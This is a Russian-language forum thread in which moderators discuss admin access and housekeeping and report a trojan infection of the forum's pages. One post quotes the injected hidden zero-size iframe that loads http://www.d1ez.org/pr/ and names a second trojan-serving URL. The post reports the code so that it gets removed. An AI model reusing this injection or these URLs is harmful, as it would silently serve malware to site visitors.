image

Текущие дела и проблемы, Возникшие вопрсы ко всем

• Тема перенесена в архив
    136
    Ответы
    8.2K
    Просмотры

• Ангел, а как можно доказать подлинность Снупа и Adm1 ???? :blink:

И ещё- что за дрянь поселилась в движке? Одним она сразу пишет- что не возможно загрузить файл, на проверку оказавшийся трояной. А у меня при просмотре в автономном режиме теперь постоянно пишет, что эта страница не доступна автономном режиме, но если проигнорировать предолжение подключится- то показывает всё нормально. ИМХО- либо в форуме действительно сидит трояна, либо кто-то забыл убрать её кости из реестра. Доведите дело до конца !

• Ответьте пожалуйста на вопрос:

кто-нибудь из модераторов может постоянно следить за обновлениями и обновлять форум?

• По конкретнее суть предложения, please :D

И ещё- кто теперь будет "официально" переводить меня с временного модерства на постоянное- Минора и Ангела с админства разжаловали, а сегодня истёк мой "испытательный" срок

И, кстати- по имеющейся у меня инфо Ангел закрыл мне доступ в админку. ИМХО- по моему зря. Наверняк такие "аварийные ситуации" на форуме будут- и кто будет держать оборону при отсутствии админов? Я конечно программист не высшего пилотажа, но и не профан ;) А бываю я на форуме утром, в обед и после 15-16 МСК до 22-23 МСК. Это железно. Ну и по мере возможности- на работе заглядываю.

P.S. А хакеры всерьез взялись за форум- я ради эксперемента часок побыл на форуме с отключенным каспером- итог сканирования потом- ровно 550 троян !!! И потом остались кости в реестре- что и вызывает вопли каспера в последствии.

• Ещё раз прошу всех, кто имеет доступ к админке- уберите из тела форума две ссылки на левые сайты!
    Именно на этих сайтах "производятся" трояны, которые лезут в комп раньше, чем выходят заплатки для антивирусов. Я замучался ежедневно сканировать комп! Юзеры уже жалуются и бегут с форума! Одна из ссылок стоит в самом конце каждой страницы форума и выглядит так:
    <iframe src='http://www.d1ez.org/pr/' width=0 height=0 style='display:none;'></iframe>

Вторая ссылка лежит где-то рядом и адресует на сайт
    www.moooooz.st/ddd/ddd.htm

P.S. Сейчас вновь обновил базу, просканировал- за ночь и утро собрал на форуме 247 троян!

• К админке доступа не имею...

• Аналогично. Кто имеет быструю связь со Снупом - сообщите ему, плз.

• Признавайтесь- кто уже дважды перемещал мою тему "Доска почёта"? Сперва в архив, теперь в вообще в корзину. Не могу я её в архиве редактировать- не достаточно прав! (И уж тем более в корзине!). Пока ведь вопрос со вставкой этих орденов под авик технически не решён!

• В Архиве и Корзине НИКТО не имеет права редактировать :) Перенеси в свободный от запретов раздел и редактируй ради Бога :)

• Товарищи админы! От имени троих модеров (включая мну) решил поинтересоваться- а нельзя ли для нас увеличить лимит ящика ЛВС ? :blink: Катастрофически не хватает его объёма и приходиться порой стирать важные письма. Попробуйте растянуть его хотя бы вдвое! :D

• Да, это действительно здорово напрягает. Было бы просто замечательно, еслиб места стало побольше...

• Хех, от имени себя и Ангела, прошу, восстановите доступ в админку :)

• Блин, от этих троян уже у компа крыша едет- сегодня весь день на форуме меня мучает прикол "сервер не найден". С третьего-четвёртого пинка лишь открывается нужная страница форума :angry:

• А у мну с каждым открытым окошком пытается ntdetect.exe запуститься... Но ему этого не дают...

• Ммммм, знаете, у меня такой проблемы нет. И при этом антивирус не визжит совсем.

• Нууу... похоже у всех разные симптомы... Эт наверное от всяких наворотов зависит... Какой антивирь, какая фаревелл... насколько винды убитые...
    Но одно ясно - что-то вредоносное сидит. Оно (вредоносное) вроде как никому ничего плохого не сделало, но мешается...

• А шо это сегодня форум разнесло в ширь???

• Кому как, а у мну Рулезно! Как раз мое разрешение! 1152! :P

• Ага, вот сейчас у мну The Bat заработал весьма рулезно- вместо приёма писем он начал их стирать на сервере! :blink: Сто процентно это с форума я подцепил с утра фигню :angry:

• Могу всех поздравить- на форуме свежая трояна, которую пока не видит каспер. А от этой трояны ужасно тормозит комп- даже каспер сканировал хард почти три часа вместо обычных 60-70 минут! Будем ждать заплатку.

• По-моему, нужно не заплатки ставить, а взять и сделать бэкап форума, просканить на вирусы базу и загрузить форум по-новой.

Хех, как говориться, знаю ЧТО делать, но не знаю КАК :D

• Тема перенесена в архив
    136
    Ответы
    8.2K
    Просмотры